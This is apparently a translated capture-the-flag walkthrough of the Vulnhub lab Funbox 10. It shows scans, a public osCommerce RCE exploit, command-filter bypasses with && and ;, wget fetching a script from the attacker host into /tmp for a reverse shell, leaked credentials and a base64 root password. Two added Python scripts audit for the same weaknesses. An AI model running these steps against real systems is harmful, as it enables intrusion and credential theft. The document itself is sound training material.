Vulnhub: Funbox 10 Under Construction, detailed walkthrough
Funbox 10
Author: jason_huawen
Basic information about the target machine
Name: Funbox: Under Construction (Funbox 10)
Address: https://www.vulnhub.com/entry/funbox-under-construction,715/
Identifying the target host's IP address
┌──(kali㉿kali)-[~/Vulnhub/Funbox10]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.63.0/16 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:3a:6b:ac 1 60 PCS Systemtechnik GmbH
192.168.56.203 08:00:27:a8:e9:7d 1 60 PCS Systemtechnik GmbH
Using netdiscover, which ships with Kali Linux, the target host's IP address is identified as 192.168.56.203.
NMAP scan
┌──(kali㉿kali)-[~/Vulnhub/Funbox10]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.203 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-21 05:58 EST
Nmap scan report for bogon (192.168.56.203)
Host is up (0.000062s latency).
Not shown: 65530 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 a2:35:c4:90:87:20:4e:b2:59:78:19:da:da:8b:c6:ed (RSA)
| 256 55:7c:a9:99:35:1b:0e:c1:ff:5d:12:a2:1c:70:7b:84 (ECDSA)
|_ 256 20:97:69:f0:8f:e0:c9:07:ee:b0:4f:02:fb:9b:ca:0c (ED25519)
25/tcp open smtp Postfix smtpd
|_smtp-commands: funbox10, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=funbox10
| Not valid before: 2021-06-24T17:27:09
|_Not valid after: 2031-06-22T17:27:09
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Khronos 2.0 - Slides
|_http-server-header: Apache/2.4.18 (Ubuntu)
110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: RESP-CODES TOP CAPA SASL UIDL AUTH-RESP-CODE PIPELINING
143/tcp open imap Dovecot imapd
|_imap-capabilities: capabilities LOGIN-REFERRALS ID LITERAL+ more have OK LOGINDISABLEDA0001 post-login ENABLE listed Pre-login IDLE IMAP4rev1 SASL-IR
MAC Address: 08:00:27:A8:E9:7D (Oracle VirtualBox virtual NIC)
Service Info: Host: funbox10; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.78 seconds
The NMAP scan shows that the target host has 5 open ports: 22 (SSH), 25 (SMTP), 80 (HTTP), 110 (POP3) and 143 (IMAP).
Get Access
Start with port 80 for information gathering and vulnerability discovery:
┌──(kali㉿kali)-[~/Vulnhub/Funbox10]
└─$ curl http://192.168.56.203/robots.txt
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache/2.4.18 (Ubuntu) Server at 192.168.56.203 Port 80</address>
</body></html>
This shows the target site has no robots.txt file. Next, scan the site's directories:
┌──(kali㉿kali)-[~/Vulnhub/Funbox10]
└─$ gobuster dir --url http://192.168.56.203 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.203
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.2.0-dev
[+] Timeout: 10s
===============================================================
2022/11/21 06:03:04 Starting gobuster in directory enumeration mode
===============================================================
/images (Status: 301) [Size: 317] [--> http://192.168.56.203/images/]
/catalog (Status: 301) [Size: 318] [--> http://192.168.56.203/catalog/]
/css (Status: 301) [Size: 314] [--> http://192.168.56.203/css/]
/js (Status: 301) [Size: 313] [--> http://192.168.56.203/js/]
/server-status (Status: 403) [Size: 279]
Progress: 215470 / 220561 (97.69%)
===============================================================
2022/11/21 06:03:17 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/Funbox10]
└─$ gobuster dir --url http://192.168.56.203 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt,.sh
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.203
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.2.0-dev
[+] Extensions: txt,sh,php,html
[+] Timeout: 10s
===============================================================
2022/11/21 06:03:52 Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
/index.html (Status: 200) [Size: 40070]
/images (Status: 301) [Size: 317] [--> http://192.168.56.203/images/]
/catalog (Status: 301) [Size: 318] [--> http://192.168.56.203/catalog/]
/css (Status: 301) [Size: 314] [--> http://192.168.56.203/css/]
/js (Status: 301) [Size: 313] [--> http://192.168.56.203/js/]
/styles.html (Status: 200) [Size: 49211]
/readme.txt (Status: 200) [Size: 4919]
/.html (Status: 403) [Size: 279]
/.php (Status: 403) [Size: 279]
/server-status (Status: 403) [Size: 279]
Progress: 1098006 / 1102805 (99.56%)
===============================================================
2022/11/21 06:04:58 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/Funbox10]
└─$ dirb http://192.168.56.203
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Mon Nov 21 06:05:03 2022
URL_BASE: http://192.168.56.203/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.56.203/ ----
==> DIRECTORY: http://192.168.56.203/catalog/
==> DIRECTORY: http://192.168.56.203/css/
+ http://192.168.56.203/favicon.ico (CODE:200|SIZE:15406)
==> DIRECTORY: http://192.168.56.203/images/
+ http://192.168.56.203/index.html (CODE:200|SIZE:40070)
==> DIRECTORY: http://192.168.56.203/js/
+ http://192.168.56.203/server-status (CODE:403|SIZE:279)
---- Entering directory: http://192.168.56.203/catalog/ ----
==> DIRECTORY: http://192.168.56.203/catalog/admin/
==> DIRECTORY: http://192.168.56.203/catalog/download/
==> DIRECTORY: http://192.168.56.203/catalog/ext/
==> DIRECTORY: http://192.168.56.203/catalog/images/
==> DIRECTORY: http://192.168.56.203/catalog/includes/
+ http://192.168.56.203/catalog/index.php (CODE:302|SIZE:37)
==> DIRECTORY: http://192.168.56.203/catalog/install/
==> DIRECTORY: http://192.168.56.203/catalog/pub/
---- Entering directory: http://192.168.56.203/css/ ----
---- Entering directory: http://192.168.56.203/images/ ----
==> DIRECTORY: http://192.168.56.203/images/demo/
==> DIRECTORY: http://192.168.56.203/images/icons/
==> DIRECTORY: http://192.168.56.203/images/slides/
---- Entering directory: http://192.168.56.203/js/ ----
---- Entering directory: http://192.168.56.203/catalog/admin/ ----
==> DIRECTORY: http://192.168.56.203/catalog/admin/backups/
==> DIRECTORY: http://192.168.56.203/catalog/admin/ext/
==> DIRECTORY: http://192.168.56.203/catalog/admin/images/
==> DIRECTORY: http://192.168.56.203/catalog/admin/includes/
+ http://192.168.56.203/catalog/admin/index.php (CODE:200|SIZE:37)
---- Entering directory: http://192.168.56.203/catalog/download/ ----
---- Entering directory: http://192.168.56.203/catalog/ext/ ----
==> DIRECTORY: http://192.168.56.203/catalog/ext/jquery/
==> DIRECTORY: http://192.168.56.203/catalog/ext/modules/
---- Entering directory: http://192.168.56.203/catalog/images/ ----
==> DIRECTORY: http://192.168.56.203/catalog/images/banners/
==> DIRECTORY: http://192.168.56.203/catalog/images/default/
==> DIRECTORY: http://192.168.56.203/catalog/images/dvd/
==> DIRECTORY: http://192.168.56.203/catalog/images/icons/
==> DIRECTORY: http://192.168.56.203/catalog/images/microsoft/
---- Entering directory: http://192.168.56.203/catalog/includes/ ----
==> DIRECTORY: http://192.168.56.203/catalog/includes/classes/
==> DIRECTORY: http://192.168.56.203/catalog/includes/functions/
==> DIRECTORY: http://192.168.56.203/catalog/includes/languages/
==> DIRECTORY: http://192.168.56.203/catalog/includes/local/
==> DIRECTORY: http://192.168.56.203/catalog/includes/modules/
==> DIRECTORY: http://192.168.56.203/catalog/includes/work/
---- Entering directory: http://192.168.56.203/catalog/install/ ----
==> DIRECTORY: http://192.168.56.203/catalog/install/images/
==> DIRECTORY: http://192.168.56.203/catalog/install/includes/
+ http://192.168.56.203/catalog/install/index.php (CODE:200|SIZE:5405)
==> DIRECTORY: http://192.168.56.203/catalog/install/templates/
---- Entering directory: http://192.168.56.203/catalog/pub/ ----
---- Entering directory: http://192.168.56.203/images/demo/ ----
---- Entering directory: http://192.168.56.203/images/icons/ ----
---- Entering directory: http://192.168.56.203/images/slides/ ----
---- Entering directory: http://192.168.56.203/catalog/admin/backups/ ----
---- Entering directory: http://192.168.56.203/catalog/admin/ext/ ----
==> DIRECTORY: http://192.168.56.203/catalog/admin/ext/modules/
---- Entering directory: http://192.168.56.203/catalog/admin/images/ ----
==> DIRECTORY: http://192.168.56.203/catalog/admin/images/icons/
---- Entering directory: http://192.168.56.203/catalog/admin/includes/ ----
==> DIRECTORY: http://192.168.56.203/catalog/admin/includes/boxes/
==> DIRECTORY: http://192.168.56.203/catalog/admin/includes/classes/
==> DIRECTORY: http://192.168.56.203/catalog/admin/includes/functions/
==> DIRECTORY: http://192.168.56.203/catalog/admin/includes/javascript/
==> DIRECTORY: http://192.168.56.203/catalog/admin/includes/languages/
==> DIRECTORY: http://192.168.56.203/catalog/admin/includes/local/
==> DIRECTORY: http://192.168.56.203/catalog/admin/includes/modules/
---- Entering directory: http://192.168.56.203/catalog/ext/jquery/ ----
==> DIRECTORY: http://192.168.56.203/catalog/ext/jquery/ui/
---- Entering directory: http://192.168.56.203/catalog/ext/modules/ ----
==> DIRECTORY: http://192.168.56.203/catalog/ext/modules/content/
==> DIRECTORY: http://192.168.56.203/catalog/ext/modules/payment/
---- Entering directory: http://192.168.56.203/catalog/images/banners/ ----
---- Entering directory: http://192.168.56.203/catalog/images/default/ ----
---- Entering directory: http://192.168.56.203/catalog/images/dvd/ ----
---- Entering directory: http://192.168.56.203/catalog/images/icons/ ----
---- Entering directory: http://192.168.56.203/catalog/images/microsoft/ ----
---- Entering directory: http://192.168.56.203/catalog/includes/classes/ ----
---- Entering directory: http://192.168.56.203/catalog/includes/functions/ ----
---- Entering directory: http://192.168.56.203/catalog/includes/languages/ ----
==> DIRECTORY: http://192.168.56.203/catalog/includes/languages/english/
---- Entering directory: http://192.168.56.203/catalog/includes/local/ ----
+ http://192.168.56.203/catalog/includes/local/README (CODE:200|SIZE:260)
---- Entering directory: http://192.168.56.203/catalog/includes/modules/ ----
==> DIRECTORY: http://192.168.56.203/catalog/includes/modules/boxes/
==> DIRECTORY: http://192.168.56.203/catalog/includes/modules/content/
==> DIRECTORY: http://192.168.56.203/catalog/includes/modules/pages/
==> DIRECTORY: http://192.168.56.203/catalog/includes/modules/payment/
==> DIRECTORY: http://192.168.56.203/catalog/includes/modules/shipping/
---- Entering directory: http://192.168.56.203/catalog/includes/work/ ----
---- Entering directory: http://192.168.56.203/catalog/install/images/ ----
---- Entering directory: http://192.168.56.203/catalog/install/includes/ ----
==> DIRECTORY: http://192.168.56.203/catalog/install/includes/functions/
---- Entering directory: http://192.168.56.203/catalog/install/templates/ ----
==> DIRECTORY: http://192.168.56.203/catalog/install/templates/pages/
---- Entering directory: http://192.168.56.203/catalog/admin/ext/modules/ ----
==> DIRECTORY: http://192.168.56.203/catalog/admin/ext/modules/payment/
---- Entering directory: http://192.168.56.203/catalog/admin/images/icons/ ----
---- Entering directory: http://192.168.56.203/catalog/admin/includes/boxes/ ----
---- Entering directory: http://192.168.56.203/catalog/admin/includes/classes/ ----
---- Entering directory: http://192.168.56.203/catalog/admin/includes/functions/ ----
---- Entering directory: http://192.168.56.203/catalog/admin/includes/javascript/ ----
---- Entering directory: http://192.168.56.203/catalog/admin/includes/languages/ ----
==> DIRECTORY: http://192.168.56.203/catalog/admin/includes/languages/english/
---- Entering directory: http://192.168.56.203/catalog/admin/includes/local/ ----
+ http://192.168.56.203/catalog/admin/includes/local/README (CODE:200|SIZE:260)
---- Entering directory: http://192.168.56.203/catalog/admin/includes/modules/ ----
==> DIRECTORY: http://192.168.56.203/catalog/admin/includes/modules/dashboard/
==> DIRECTORY: http://192.168.56.203/catalog/admin/includes/modules/newsletters/
---- Entering directory: http://192.168.56.203/catalog/ext/jquery/ui/ ----
---- Entering directory: http://192.168.56.203/catalog/ext/modules/content/ ----
==> DIRECTORY: http://192.168.56.203/catalog/ext/modules/content/account/
---- Entering directory: http://192.168.56.203/catalog/ext/modules/payment/ ----
==> DIRECTORY: http://192.168.56.203/catalog/ext/modules/payment/paypal/
---- Entering directory: http://192.168.56.203/catalog/includes/languages/english/ ----
==> DIRECTORY: http://192.168.56.203/catalog/includes/languages/english/images/
+ http://192.168.56.203/catalog/includes/languages/english/index.php (CODE:200|SIZE:0)
==> DIRECTORY: http://192.168.56.203/catalog/includes/languages/english/modules/
---- Entering directory: http://192.168.56.203/catalog/includes/modules/boxes/ ----
---- Entering directory: http://192.168.56.203/catalog/includes/modules/content/ ----
==> DIRECTORY: http://192.168.56.203/catalog/includes/modules/content/account/
==> DIRECTORY: http://192.168.56.203/catalog/includes/modules/content/login/
---- Entering directory: http://192.168.56.203/catalog/includes/modules/pages/ ----
---- Entering directory: http://192.168.56.203/catalog/includes/modules/payment/ ----
---- Entering directory: http://192.168.56.203/catalog/includes/modules/shipping/ ----
---- Entering directory: http://192.168.56.203/catalog/install/includes/functions/ ----
---- Entering directory: http://192.168.56.203/catalog/install/templates/pages/ ----
+ http://192.168.56.203/catalog/install/templates/pages/index.php (CODE:500|SIZE:70)
---- Entering directory: http://192.168.56.203/catalog/admin/ext/modules/payment/ ----
---- Entering directory: http://192.168.56.203/catalog/admin/includes/languages/english/ ----
==> DIRECTORY: http://192.168.56.203/catalog/admin/includes/languages/english/images/
+ http://192.168.56.203/catalog/admin/includes/languages/english/index.php (CODE:200|SIZE:0)
==> DIRECTORY: http://192.168.56.203/catalog/admin/includes/languages/english/modules/
---- Entering directory: http://192.168.56.203/catalog/admin/includes/modules/dashboard/ ----
---- Entering directory: http://192.168.56.203/catalog/admin/includes/modules/newsletters/ ----
---- Entering directory: http://192.168.56.203/catalog/ext/modules/content/account/ ----
---- Entering directory: http://192.168.56.203/catalog/ext/modules/payment/paypal/ ----
==> DIRECTORY: http://192.168.56.203/catalog/ext/modules/payment/paypal/images/
---- Entering directory: http://192.168.56.203/catalog/includes/languages/english/images/ ----
==> DIRECTORY: http://192.168.56.203/catalog/includes/languages/english/images/buttons/
---- Entering directory: http://192.168.56.203/catalog/includes/languages/english/modules/ ----
==> DIRECTORY: http://192.168.56.203/catalog/includes/languages/english/modules/boxes/
==> DIRECTORY: http://192.168.56.203/catalog/includes/languages/english/modules/content/
==> DIRECTORY: http://192.168.56.203/catalog/includes/languages/english/modules/payment/
==> DIRECTORY: http://192.168.56.203/catalog/includes/languages/english/modules/shipping/
---- Entering directory: http://192.168.56.203/catalog/includes/modules/content/account/ ----
---- Entering directory: http://192.168.56.203/catalog/includes/modules/content/login/ ----
==> DIRECTORY: http://192.168.56.203/catalog/includes/modules/content/login/templates/
---- Entering directory: http://192.168.56.203/catalog/admin/includes/languages/english/images/ ----
==> DIRECTORY: http://192.168.56.203/catalog/admin/includes/languages/english/images/buttons/
---- Entering directory: http://192.168.56.203/catalog/admin/includes/languages/english/modules/ ----
==> DIRECTORY: http://192.168.56.203/catalog/admin/includes/languages/english/modules/boxes/
==> DIRECTORY: http://192.168.56.203/catalog/admin/includes/languages/english/modules/dashboard/
==> DIRECTORY: http://192.168.56.203/catalog/admin/includes/languages/english/modules/newsletters/
---- Entering directory: http://192.168.56.203/catalog/ext/modules/payment/paypal/images/ ----
---- Entering directory: http://192.168.56.203/catalog/includes/languages/english/images/buttons/ ----
---- Entering directory: http://192.168.56.203/catalog/includes/languages/english/modules/boxes/ ----
---- Entering directory: http://192.168.56.203/catalog/includes/languages/english/modules/content/ ----
==> DIRECTORY: http://192.168.56.203/catalog/includes/languages/english/modules/content/account/
==> DIRECTORY: http://192.168.56.203/catalog/includes/languages/english/modules/content/login/
---- Entering directory: http://192.168.56.203/catalog/includes/languages/english/modules/payment/ ----
---- Entering directory: http://192.168.56.203/catalog/includes/languages/english/modules/shipping/ ----
---- Entering directory: http://192.168.56.203/catalog/includes/modules/content/login/templates/ ----
---- Entering directory: http://192.168.56.203/catalog/admin/includes/languages/english/images/buttons/ ----
---- Entering directory: http://192.168.56.203/catalog/admin/includes/languages/english/modules/boxes/ ----
---- Entering directory: http://192.168.56.203/catalog/admin/includes/languages/english/modules/dashboard/ ----
---- Entering directory: http://192.168.56.203/catalog/admin/includes/languages/english/modules/newsletters/ ----
---- Entering directory: http://192.168.56.203/catalog/includes/languages/english/modules/content/account/ ----
---- Entering directory: http://192.168.56.203/catalog/includes/languages/english/modules/content/login/ ----
-----------------
END_TIME: Mon Nov 21 06:06:44 2022
DOWNLOADED: 368960 - FOUND: 11
The scan reveals the directory /catalog/. Visiting it returns a page showing that the CMS is osCommerce, version 2.3.4.1. A search for known vulnerabilities in this version turns up exploit code at the following address:
https://www.exploit-db.com/exploits/50128
Download the code to the local Kali machine:
┌──(kali㉿kali)-[~/Vulnhub/Funbox10]
└─$ ls
50128.py nmap_full_scan
┌──(kali㉿kali)-[~/Vulnhub/Funbox10]
└─$ mv 50128.py exploit.py
┌──(kali㉿kali)-[~/Vulnhub/Funbox10]
└─$ python exploit.py http://192.168.56.203/catalog/
[*] Install directory still available, the host likely vulnerable to the exploit.
[*] Testing injecting system command to test vulnerability
User: RCE_SHELL$ id
RCE_SHELL$ pwd
RCE_SHELL$ ls
configure.php.bak
functions
RCE_SHELL$ cat configure.php.bak
define('HTTPS_SERVER', '://');
define('ENABLE_SSL', false);
define('HTTP_COOKIE_DOMAIN', 'funbox10');
define('HTTPS_COOKIE_DOMAIN', '');
define('HTTP_COOKIE_PATH', '/');
define('HTTPS_COOKIE_PATH', '/');
define('DIR_WS_HTTP_CATALOG', '/');
define('DIR_WS_HTTPS_CATALOG', '/');
define('DIR_WS_IMAGES', 'images/');
define('DIR_WS_ICONS', DIR_WS_IMAGES . 'icons/');
define('DIR_WS_INCLUDES', 'includes/');
define('DIR_WS_FUNCTIONS', DIR_WS_INCLUDES . 'functions/');
define('DIR_WS_CLASSES', DIR_WS_INCLUDES . 'classes/');
define('DIR_WS_MODULES', DIR_WS_INCLUDES . 'modules/');
define('DIR_WS_LANGUAGES', DIR_WS_INCLUDES . 'languages/');
define('DIR_WS_DOWNLOAD_PUBLIC', 'pub/');
define('DIR_FS_CATALOG', './');
define('DIR_FS_DOWNLOAD', DIR_FS_CATALOG . 'download/');
define('DIR_FS_DOWNLOAD_PUBLIC', DIR_FS_CATALOG . 'pub/');
define('DB_SERVER', 'localhost');
define('DB_SERVER_USERNAME', 'jack');
define('DB_SERVER_PASSWORD', 'yellow');
define('DB_DATABASE', 'c3VzYW46c2hhZG93_catalog');passthru('ls -la');/*');
define('USE_PCONNECT', 'false');
define('STORE_SESSIONS', 'mysql');
?>
RCE_SHELL$ which more
RCE_SHELL$ cd /etc
RCE_SHELL$ ls
configure.php.bak
functions
RCE_SHELL$
Although we obtained a shell, it appears to be a restricted one. After several attempts it turns out that using && or ; evades some of the filtering, and commands then execute successfully:
RCE_SHELL$ ls&&id
configure.php.bak
functions
uid=33(www-data) gid=33(www-data) groups=33(www-data)
RCE_SHELL$
The wget command is also present, so can a script be uploaded to the target host?
RCE_SHELL$
RCE_SHELL$ ls;which wget
configure.php.bak
functions
/usr/bin/wget
RCE_SHELL$
Execution failed!
This is because of the permissions on the directory the script was written to. Instead, write a shell script locally on Kali Linux, upload it to /tmp using the bypass above, and then execute it:
RCE_SHELL$ ls&&wget http://192.168.56.137:8000/sh.sh -O /tmp/sh.sh
configure.php.bak
functions
RCE_SHELL$ ls&&cd /tmp&&ls -alh
configure.php.bak
functions
total 40K
drwxrwxrwt 9 root root 4.0K Nov 21 12:51 .
drwxr-xr-x 23 root root 4.0K Jun 25 2021 ..
drwxrwxrwt 2 root root 4.0K Nov 21 11:55 .ICE-unix
drwxrwxrwt 2 root root 4.0K Nov 21 11:55 .Test-unix
drwxrwxrwt 2 root root 4.0K Nov 21 11:55 .X11-unix
drwxrwxrwt 2 root root 4.0K Nov 21 11:55 .XIM-unix
drwxrwxrwt 2 root root 4.0K Nov 21 11:55 .font-unix
-rw-r--r-- 1 www-data www-data 57 Nov 21 12:50 sh.sh
drwx------ 3 root root 4.0K Nov 21 11:55 systemd-private-15479c0c3761446b84a68dbffdff1b98-dovecot.service-UUIyo3
drwx------ 3 root root 4.0K Nov 21 11:55 systemd-private-15479c0c3761446b84a68dbffdff1b98-systemd-timesyncd.service-0Jovz1
RCE_SHELL$ ls&&cd /tmp&& bash sh.sh
This gives a reverse shell back on Kali Linux, and a fairly normal one at that, haha
┌──(kali㉿kali)-[~/Vulnhub/Funbox10]
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [192.168.56.137] from (UNKNOWN) [192.168.56.203] 56238
bash: cannot set terminal process group (1248): Inappropriate ioctl for device
bash: no job control in this shell
www-data@funbox10:/tmp$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@funbox10:/tmp$ whoami
whoami
www-data
www-data@funbox10:/tmp$
However, there is no permission to enter any regular user's home directory. Next, upload the linpeas.sh script.
Running the script suggests the target could be escalated with dirty cow 2, but the target has no gcc compiler; although the linpeas.sh output claims gcc-5 is present, it actually is not, so this path is abandoned for now.
After some searching, the following file turned up. Its contents had already been noticed and tried during the pseudo-shell stage:
www-data@funbox10:/var/www/html/catalog/install/includes$ cat configure.php.bak
<?php
define('HTTP_SERVER', 'http://funbox10/catalog');
define('HTTPS_SERVER', '://');
define('ENABLE_SSL', false);
define('HTTP_COOKIE_DOMAIN', 'funbox10');
define('HTTPS_COOKIE_DOMAIN', '');
define('HTTP_COOKIE_PATH', '/');
define('HTTPS_COOKIE_PATH', '/');
define('DIR_WS_HTTP_CATALOG', '/');
define('DIR_WS_HTTPS_CATALOG', '/');
define('DIR_WS_IMAGES', 'images/');
define('DIR_WS_ICONS', DIR_WS_IMAGES . 'icons/');
define('DIR_WS_INCLUDES', 'includes/');
define('DIR_WS_FUNCTIONS', DIR_WS_INCLUDES . 'functions/');
define('DIR_WS_CLASSES', DIR_WS_INCLUDES . 'classes/');
define('DIR_WS_MODULES', DIR_WS_INCLUDES . 'modules/');
define('DIR_WS_LANGUAGES', DIR_WS_INCLUDES . 'languages/');
define('DIR_WS_DOWNLOAD_PUBLIC', 'pub/');
define('DIR_FS_CATALOG', './');
define('DIR_FS_DOWNLOAD', DIR_FS_CATALOG . 'download/');
define('DIR_FS_DOWNLOAD_PUBLIC', DIR_FS_CATALOG . 'pub/');
define('DB_SERVER', 'localhost');
define('DB_SERVER_USERNAME', 'jack');
define('DB_SERVER_PASSWORD', 'yellow');
define('DB_DATABASE', 'c3VzYW46c2hhZG93_catalog');passthru('ls -la');/*');
define('USE_PCONNECT', 'false');
define('STORE_SESSIONS', 'mysql');
This reveals the username jack and his password, so switch to user jack.
Then the following file was found. It is hard to discover and linpeas.sh did not flag it; this step was taken from other people's walkthroughs:
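The two findings that made this target exploitable, a still-reachable /catalog/install/ directory and a readable configure.php.bak carrying the database credentials, are exactly what a post-deployment check should catch. The script below is an added example, not part of the original write-up or of osCommerce: it walks a web root, flags leftover installer directories, and flags backup files that still define DB_SERVER_USERNAME / DB_SERVER_PASSWORD, using a constructed copy of the layout seen on the target.

```python
import os
import re
import tempfile
from pathlib import Path

# Directory names an installer leaves behind; they should be removed after setup.
INSTALLER_DIRS = {"install", "setup", "installer"}
# Editor/backup suffixes that Apache serves as plain text instead of running as PHP.
BACKUP_SUFFIXES = (".bak", ".old", ".orig", ".save", "~")
# osCommerce-style credential defines worth flagging inside a leaked file.
CRED_RE = re.compile(
    r"define\('(DB_SERVER_USERNAME|DB_SERVER_PASSWORD)',\s*'([^']*)'\)")

# Constructed excerpt of the configure.php.bak dumped above (values from the page).
SAMPLE_BACKUP = """<?php
define('DB_SERVER', 'localhost');
define('DB_SERVER_USERNAME', 'jack');
define('DB_SERVER_PASSWORD', 'yellow');
"""


def audit_webroot(root):
    """Return sorted (severity, relative_path, message) findings for a web root."""
    root = Path(root)
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        rel_dir = Path(dirpath).relative_to(root)
        for d in dirnames:
            if d.lower() in INSTALLER_DIRS:
                findings.append(("HIGH", (rel_dir / d).as_posix(),
                                 "installer directory still present"))
        for f in filenames:
            if not f.endswith(BACKUP_SUFFIXES):
                continue
            rel = (rel_dir / f).as_posix()
            text = (Path(dirpath) / f).read_text(errors="replace")
            names = [name for name, _ in CRED_RE.findall(text)]
            if names:
                findings.append(("CRITICAL", rel,
                                 "backup file defines " + ", ".join(names)))
            else:
                findings.append(("MEDIUM", rel, "backup file served from web root"))
    return sorted(findings)


def build_sample_webroot():
    """Create a throwaway tree mirroring the paths seen on the target."""
    root = Path(tempfile.mkdtemp(prefix="webroot-"))
    (root / "catalog" / "install" / "includes").mkdir(parents=True)
    (root / "catalog" / "includes").mkdir(parents=True)
    (root / "catalog" / "install" / "index.php").write_text("<?php // installer\n")
    # The live config is a .php file, so it is executed rather than served: not flagged.
    (root / "catalog" / "includes" / "configure.php").write_text(SAMPLE_BACKUP)
    # The .bak copy is served verbatim by Apache: flagged as CRITICAL.
    (root / "catalog" / "install" / "includes" / "configure.php.bak").write_text(SAMPLE_BACKUP)
    return root


if __name__ == "__main__":
    for severity, path, message in audit_webroot(build_sample_webroot()):
        print(f"[{severity}] {path}: {message}")
```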
jack@funbox10:/usr/share/doc/examples$ ls -alh
ls -alh
total 32K
drwxr-xr-x 2 root root 4.0K Jul 17 2021 .
drwxr-xr-x 544 root root 20K Jul 18 2021 ..
-rwxr-xr-x 1 root root 90 Jul 17 2021 cron.sh
jack@funbox10:/usr/share/doc/examples$ cat cron.sh
cat cron.sh
# cron.sh sample file
# 0 20 * * * /bin/goahead --parameter: LXUgcm9vdCAtcCByZnZiZ3QhIQ==
jack@funbox10:/usr/share/doc/examples$
Decoding it yields the root password:
┌──(kali㉿kali)-[~]
└─$ echo "LXUgcm9vdCAtcCByZnZiZ3QhIQ==" | base64 -d
-u root -p rfvbgt!!
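A base64 string in a sample script is easy to overlook by eye, which is why neither linpeas.sh nor a quick read caught cron.sh. The added example below (not part of the original write-up) is a small secret scanner: it finds base64-looking tokens in text, keeps only those that decode to printable text, and marks decoded strings that carry a password-style command-line flag. The sample input is constructed from the cron.sh lines above plus one public-key fragment that decodes to binary and must not be reported.

```python
import base64
import binascii
import re

# Constructed sample: cron.sh as dumped above, plus a key fragment as a negative case.
SAMPLE = """# cron.sh sample file
# 0 20 * * * /bin/goahead --parameter: LXUgcm9vdCAtcCByZnZiZ3QhIQ==
# key id: AAAAB3NzaC1yc2EAAAADAQAB
"""

# A run of at least 16 base64-alphabet characters, with optional padding,
# not glued to other base64 characters on either side.
B64_RE = re.compile(r"(?<![A-Za-z0-9+/])[A-Za-z0-9+/]{16,}={0,2}(?![A-Za-z0-9+/=])")
# Flags that usually carry a password on a command line.
PASSWORD_FLAG_RE = re.compile(r"(?:^|\s)(?:-p|--password|--pass|-pass)(?:[=\s]|$)")


def decode_if_text(token):
    """Return the decoded token if it is valid base64 of printable UTF-8, else None."""
    try:
        raw = base64.b64decode(token, validate=True)
    except (binascii.Error, ValueError):
        return None
    try:
        text = raw.decode("utf-8")
    except UnicodeDecodeError:
        return None
    if text and all(ch.isprintable() or ch in "\n\t" for ch in text):
        return text
    return None


def scan_text(text):
    """Return (line_no, token, decoded, suspicious) for every decodable token."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for match in B64_RE.finditer(line):
            decoded = decode_if_text(match.group(0))
            if decoded is None:
                continue  # binary or not base64 at all (e.g. the key fragment)
            suspicious = bool(PASSWORD_FLAG_RE.search(decoded))
            hits.append((lineno, match.group(0), decoded, suspicious))
    return hits


if __name__ == "__main__":
    for lineno, token, decoded, suspicious in scan_text(SAMPLE):
        label = "CREDENTIAL?" if suspicious else "text"
        print(f"line {lineno}: {token} -> {decoded!r} [{label}]")
```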
jack@funbox10:/usr/share/doc/examples$ su - root
su - root
Password: rfvbgt!!
root@funbox10:~# id
id
uid=0(root) gid=0(root) groups=0(root)
root@funbox10:~# cd /root
cd /root
root@funbox10:~# ls -alh
ls -alh
total 3.0M
drwx------ 2 root root 4.0K Jul 19 2021 .
drwxr-xr-x 23 root root 4.0K Jun 25 2021 ..
-rw------- 1 root root 29 Jul 19 2021 .bash_history
-rw-r--r-- 1 root root 3.1K Oct 22 2015 .bashrc
-rw------- 1 root root 544 Jul 17 2021 .mysql_history
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rwxr-xr-x 1 root root 3.0M Aug 22 2019 pspy64
-rw-r--r-- 1 root root 1.1K Jul 17 2021 root.txt
